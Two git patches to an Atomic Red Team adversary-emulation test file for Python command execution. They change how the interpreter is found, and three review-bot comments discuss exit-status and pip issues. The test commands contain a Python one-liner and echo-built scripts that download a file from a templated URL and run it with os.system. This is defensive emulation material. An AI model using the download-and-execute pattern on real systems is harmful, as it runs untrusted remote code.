From e17fea0cb590e6d0f74e0388b3311784e941b0e0 Mon Sep 17 00:00:00 2001
From: Sebastian Reitenbach
Date: Thu, 4 Nov 2021 12:57:05 +0100
Subject: [PATCH 1/2] fix T1059.006 tests 1-3 which_python is only set in the prereq_command, but not in the actual command to run the test, therefore it doesn't find python
---
 atomics/T1059.006/T1059.006.yaml | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml
index 3c3714ec..e3e36fcd 100644
--- a/atomics/T1059.006/T1059.006.yaml
+++ b/atomics/T1059.006/T1059.006.yaml
@@ -33,6 +33,7 @@ atomic_tests:
 pip install requests
 executor:
 command: |
+ which_python=`which python`
 $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
 name: sh
 cleanup_command: |
@@ -74,6 +75,7 @@ atomic_tests:
 pip install requests
 executor:
 command: |
+ which_python=`which python`
 echo 'import requests' > #{python_script_name}
 echo 'import os' >> #{python_script_name}
 echo 'url = "#{script_url}"' >> #{python_script_name}
@@ -130,6 +132,7 @@ atomic_tests:
 pip install requests
 executor:
 command: |
+ which_python=`which python`
 echo 'import requests' > #{python_script_name}
 echo 'import os' >> #{python_script_name}
 echo 'url = "#{script_url}"' >> #{python_script_name}
From 39981d6ae97234c85c8ada8eff7907612956e130 Mon Sep 17 00:00:00 2001
From: Sebastian Reitenbach
Date: Thu, 4 Nov 2021 14:21:47 +0100
Subject: [PATCH 2/2] This one is even better, no need for ln -s /usr/bin/python3 /usr/bin/python taken from T1003.007-2
---
 atomics/T1059.006/T1059.006.yaml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml
index e3e36fcd..5a833829 100644
--- a/atomics/T1059.006/T1059.006.yaml
+++ b/atomics/T1059.006/T1059.006.yaml
@@ -27,13 +27,13 @@ atomic_tests:
 dependencies:
 - description: Verify if python is in the environment variable path and attempt to import requests library.
 prereq_command: |
- which_python=`which python`; python -V
+ which_python=$(which python || which python3 || which python2); $which_python -V
 $which_python -c 'import requests' 2>/dev/null; echo $?
 get_prereq_command: |
 pip install requests
 executor:
 command: |
- which_python=`which python`
+ which_python=$(which python || which python3 || which python2)
 $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
 name: sh
 cleanup_command: |
@@ -69,13 +69,13 @@ atomic_tests:
 - description: |
 Requires Python
 prereq_command: |
- which_python=`which python`; python -V
+ which_python=$(which python || which python3 || which python2); $which_python -V
 $which_python -c 'import requests' 2>/dev/null; echo $?
 get_prereq_command: |
 pip install requests
 executor:
 command: |
- which_python=`which python`
+ which_python=$(which python || which python3 || which python2)
 echo 'import requests' > #{python_script_name}
 echo 'import os' >> #{python_script_name}
 echo 'url = "#{script_url}"' >> #{python_script_name}
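Review bot: The prereq_command in the hunk at -27 still ends with `; echo $?`, so the exit status of the check is that of `echo` (0) even when the import fails or none of the three `which` lookups finds an interpreter. If the runner decides whether the prerequisite is met from the exit status, which this page does not show, the check passes unconditionally and the new fallback chain is never really validated. Dropping the echo so the last command is `$which_python -c 'import requests' 2>/dev/null` would let a missing interpreter or module surface as a failure. The same context line appears in the hunks at -69 and -126.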
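Review bot: `get_prereq_command` in the hunk at -69 still runs a bare `pip install requests`, which is not tied to the interpreter that the new `which python || which python3 || which python2` chain selects. On a host where only python3 resolves, `pip` may be missing or belong to a different Python, so the install can succeed while `$which_python -c 'import requests'` keeps failing. Resolving the interpreter the same way there, `which_python=$(which python || which python3 || which python2); $which_python -m pip install requests`, keeps the check and the install on one interpreter; this assumes pip is importable as a module for it. The hunks at -27 and -126 carry the same line.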
@@ -126,13 +126,13 @@ atomic_tests:
 - description: |
 Requires Python
 prereq_command: |
- which_python=`which python`; python -V
+ which_python=$(which python || which python3 || which python2); $which_python -V
 $which_python -c 'import requests' 2>/dev/null; echo $?
 get_prereq_command: |
 pip install requests
 executor:
 command: |
- which_python=`which python`
+ which_python=$(which python || which python3 || which python2)
 echo 'import requests' > #{python_script_name}
 echo 'import os' >> #{python_script_name}
 echo 'url = "#{script_url}"' >> #{python_script_name}
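Review bot: Nothing in the executor command handles the case where all three `which` lookups fail: `which_python` is then empty and, because it is expanded unquoted, whatever invokes it later (outside this hunk) runs with its first argument as the command name. The hunk at -27 shows this directly, where `$which_python -c '…'` would try to execute `-c`. A guard right after the assignment, `[ -n "$which_python" ] || { echo 'no python interpreter found' >&2; exit 1; }`, makes the test fail with a clear message instead. `command -v` is the POSIX-specified lookup if the executor is a plain `sh`, as it is in the first test. The executor block continues past the end of the hunk.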